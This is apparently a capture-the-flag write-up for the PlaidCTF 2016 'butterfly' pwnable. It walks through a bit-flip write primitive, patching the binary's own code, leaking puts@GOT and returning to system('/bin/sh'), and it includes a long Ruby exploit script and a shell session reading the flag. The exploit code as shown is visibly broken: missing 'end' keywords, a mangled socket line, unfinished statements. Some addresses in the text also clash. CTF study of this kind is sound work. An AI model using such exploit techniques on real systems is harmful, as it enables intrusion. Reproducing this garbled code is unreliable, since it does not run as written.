Plaid CTF 2016: Butterfly Writeup (pwn 150)
0. Introduction
This pwnable challange from PlaidCTF 2016 consists of a binary, which is an “ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped”
The main routine is pretty small, and mostly consist of an fgets and a two mprotect calls, allowing you to mark any memory location as readable/writable/executable. While looking for potential vulnerabilities, I thought that the “fgets” call looks intersting. But after noticing that the number of bytes it reads (0x32) is less than the size of the current stack frame, I realized that standard buffer overflow is out of the question.
The next thing I looked for are signs of user-controllable writes. Luckily, “mov byte [ss:rbp], cl” provides us a single-byte write primitive that we can partially control, although somewhat limited, which we’ll go into more detail in the next section.
000000000040080f 80E307 and bl, 0x7
0000000000400812 41BE01000000 mov r14d, 0x1
0000000000400818 B801000000 mov eax, 0x1
000000000040081d 88D9 mov cl, bl
000000000040081f D3E0 shl eax, cl
0000000000400821 0FB64D00 movzx ecx, byte [ss:rbp]
0000000000400825 31C1 xor ecx, eax
0000000000400827 884D00 mov byte [ss:rbp], cl
1. Understanding Byte Mutation
Based on the code snippet above, we can see that a byte can be mutated through an XOR of itself and byte 0x1, shifted by a user controllable amount (although only limited to 0..7). The ruby function to calculate valid mutations is shown below.
def valid_mutations(byte)
(0..7).map { |i| (byte ^ (0x1 << i)) }
As an example, byte 48, which represents the ASCII string ‘0’, can only be changed in the following bytes
1.9.3-p194 :005 > valid_mutations(48)
=> [49, 50, 52, 56, 32, 16, 112, 176]
2. Single-byte Write Anything/Anywhere
Sure, we can only mutate a byte to a limited number of output on a single run. But nothing stops us from mutating the mutation again. For example, to change byte 48 to 24, we can mutate 48 into 56 first. Then mutate 56 into 24.
1.9.3-p194 :011 > valid_mutations(56)
=> [57, 58, 60, 48, 40, 24, 120, 184]
In order to achieve a write anything to anywhere, we basically need a function that generates a sequence of valid mutations that we can validly send over to the server one at a time until the target byte is changed into our desired byte. All we need now is to write the code for find_correct_mutation_sequence(from_byte, to_byte)
def find_correct_mutation_sequence(from_byte, to_byte)
sequence_list = [[from_byte]]
generation = 1
max_generation = 10
while generation <= max_generation
found = sequence_list.find { |sequence| sequence.last == to_byte }
break if found
generation += 1
sequence_list = mutate_sequence(sequence_list)
3. Controlling Program Flow
Now that we have a single-byte write anything/anywhere (including code segment), and a convenient mprotect (read/write/execute), we can change the program to behave the way we want as long we don’t accidentally corrupt opcode instructions.
However, we still have another problem. The user controlled write happens only once, after which the program exits. Ideally, we want the main function to run in an endless loop.
Our stack size is around 0x68, and fgets reads in 0x32 bytes. However, if we change the stack cleanup epilogue instruction below such that it moves that stack pointer to somewhere in our fgets buffer (where we can specify our own return address), program flow redirection is achieved.
- add rsp, 0x48
+ add rsp, 0x8
By reducing the 0x48 into 0x8, and specifying the return address to point back to the beginning of the main function, located at 0x400788, we now have a looping program that allows us to mutate program bytes infinite number of times.
1.9.3-p194 :012 > valid_mutations(0x48)
=> [73, 74, 76, 64, 88, 104, 8, 200]
4. Exploitation
All we need to do now is get our shell, which we can achieve by finding the system GOT entry, and have RDI register contain the address to “/bin/sh”
The system GOT can be calculated by leaking the puts@GOT and subtracing it by the difference in their offsets. To do that, we modify 0x400956 to 0x600cd0 (address of puts@GOT)
0000000000400840 BFd00c6000 mov edi, 0x600cd0 ; puts@GOT, argument "s" for method j_puts
0000000000400845 E8B6FDFFFF call j_puts
After that, we can put “/bin/sh” in a fixed location, such as 0x400942, which originally contains “mprotect1”
000000000040086b BF42094000 mov edi, 0x400942 ; "/bin/sh", argument "s" for method j_perror, XREF=main+133
Then, in order to get 0x400914 into the RDI register, we can modify pop rbp
into pop rdi
0000000000400869 5F pop rdi
000000000040086a C3 ret
Finally, we just need to send our payload containing the address of “/bin/sh” which will be poped into RDI, and our desired return address “system@GOT”
4. Final Code
The final code is shown below
require 'socket'
require 'pathname'
class Solver
def initialize
@socket ="",9999)
def run
mprotect_1_addr = bin_sh_addr = 0x400942
add_rsp_48_addr = 0x400863
mov_was_it_worth_addr = 0x400841
pop_rbp_addr = 0x400869
any_string_addr = 0x400248
puts "== Step 1: adjust stack pointer such that return address points to fgets buffer"
write_byte(add_rsp_48_addr, 0x48, 0x8)
puts "== Step 2: leak puts@got"
data = begin
write_byte(mov_was_it_worth_addr , 0x56, 0xd0)
write_byte(mov_was_it_worth_addr + 1 , 0x09, 0x0c)
write_byte(mov_was_it_worth_addr + 2 , 0x40, 0x60)
# ensures that data length is 8 bytes
puts_got = data.split("\n").first.ljust(8,"\x00").unpack("Q").first
system_got = puts_got - libc_system_offset
puts "== Step 3: write /bin/sh into data section"
write_string(mprotect_1_addr,"mprotect1", "/bin/sh")
puts "== Step 4: Change pop rbp into pop rdi"
puts "== Step 5: Send our actual payload (contains system_got + bin/sh address)"
mprotect_target = encoded_mprotect_target(any_string_addr)
middle = "R" * 23
middle += [bin_sh_addr].pack("Q") # will be used in 'pop rdi'
return_addr = [system_got].pack("Q")
send(mprotect_target + middle + return_addr)
puts "pwn.."
def interact
while cmd = gets.strip
if cmd.length > 0
puts recv("")
def recv(expected = "", size = 2048)
data = ""
loop do
data += @socket.recv(size)
break if data.include?(expected)
def send(data)
def valid_mutations(byte)
(0..7).map { |i| (byte ^ (0x1 << i)) }
def valid_mutation_index(from_byte, to_byte)
def mutation_index_chain(sequence)
(0..sequence.length - 2).map do |i|
valid_mutation_index(sequence[i], sequence[i + 1])
def mutate_sequence(sequence_list) do |sequence|
byte = sequence.last
mutations = valid_mutations(byte) { |mutation| [sequence, mutation].flatten }
def find_correct_mutation_sequence(from_byte, to_byte)
sequence_list = [[from_byte]]
generation = 1
max_generation = 10
while generation <= max_generation
found = sequence_list.find { |sequence| sequence.last == to_byte }
break if found
generation += 1
sequence_list = mutate_sequence(sequence_list)
def encoded_mprotect_target(address, xor_index = 0)
sal = (address << 3)
"0x" + (sal + xor_index).to_s(16)
def send_byte_mutation_payload(address, xor_index)
main_begin_addr = 0x400788
mprotect_target = encoded_mprotect_target(address, xor_index)
middle = "R" * (31)
return_addr = [main_begin_addr].pack("Q") #
send(mprotect_target + middle + return_addr)
# A single-byte write anywhere primitive
def write_byte(address, from_byte, to_byte)
print "calculating byte mutation sequence for #{from_byte} -> #{to_byte} \t"
sequence = find_correct_mutation_sequence(from_byte, to_byte)
puts sequence.inspect
data = ""
mutation_index_chain(sequence).each do |xor_index|
send_byte_mutation_payload(address, xor_index)
data = recv("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n") # flush buffer
def write_string(address, source, target)
target.split("").each_with_index do |char, index|
write_byte(address + index, source[index].ord, char.ord)
# null terminate string
write_byte(address + target.length, source[target.length].ord, 0x00)
def libc_system_offset
puts_offset = 0x6fe30
system_offset = 0x46640
puts_offset - system_offset
client =
And finally, to get the flag
ls -l
total 20
-rwxr-xr-x 1 root root 8328 Apr 15 18:26 butterfly
-r--r----- 1 root problem 28 Apr 15 18:28 flag
-rwxr-xr-x 1 root root 219 Apr 15 21:49 wrapper
cat flag